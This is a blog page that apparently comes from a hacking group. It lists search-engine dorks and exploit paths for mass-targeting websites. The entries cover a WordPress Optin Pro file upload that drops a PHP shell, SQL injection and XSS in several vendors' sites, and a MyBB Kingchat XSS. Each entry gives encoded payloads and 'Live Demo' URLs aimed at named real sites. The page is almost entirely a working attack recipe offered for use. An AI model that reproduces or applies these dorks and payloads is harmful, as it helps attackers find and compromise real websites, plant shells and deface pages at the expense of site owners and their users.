Welcome To My Blog!!
Saturday, July 19, 2014
Exploit WordPress: Optin Pro - File Upload Vulnerability
Once again, i'm not gonna explain anything about this exploit since it is exactly the same as my previous post. So, i'm just gonna give you the dork and exploit.
DORK: inurl:/wp-content/uploads/svp/headerimage/
inurl:/wp-content/plugins/wp_optin_pro/
EXPLOIT:/wp-content/plugins/wp_optin_pro/media-upload.php
SHELL UPLOADED TO: /wp-content/uploads/svp/headerimage/random_id_filename.php
Espacio Ecuador XSS & SQLI
Dork:
intext:"developed by Espacio Ecuador"
Exploits:
http://site.com/*.*?id= <SQLI>
http://site.com/*.*?id= < XSS>
Live Demo:
SQLI:
http://www.galapagostraveline.com/deal.html?opc=31%27
XSS:
http://www.galapagostraveline.com/deal.html?opc=31%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E
Pej Studio & Nissi Infotech & Plante Graffix - XSS
Dork:
intext:"Created By Nissi Infotech"
Exploits:
http://target.com/name.php?id= [XSS & SQLI]
Live Demo:
http://www.jayapriya.com/realestate/projectdetail.php?id=42%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
MyBB Kingchat - XSS
Dork:
inurl:/kingchat.php?
Exploit:
/kingchat.php?notic
Change that /... into this to see exploit:
/kingchat.php?chat=2&l=2
Then add your scripts...
Live Demo:
http://www.embargoedchat.co.uk/kingchat.php?chat=2&l=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
Pro-Service - XSS Vulnerability
Dorks:
intext:"Pro-Service" inurl:"/resume_list.php?id="
intext:"Pro-Service"
Exploit:
/resume_list.php?id=
Live Demo:
http://www.staff.ge/resume_list.php?id=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,78,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
Posted in: NEXUS.PRO.XSS
Newer Posts
Older Posts
Home
Subscribe to:
Posts (Atom)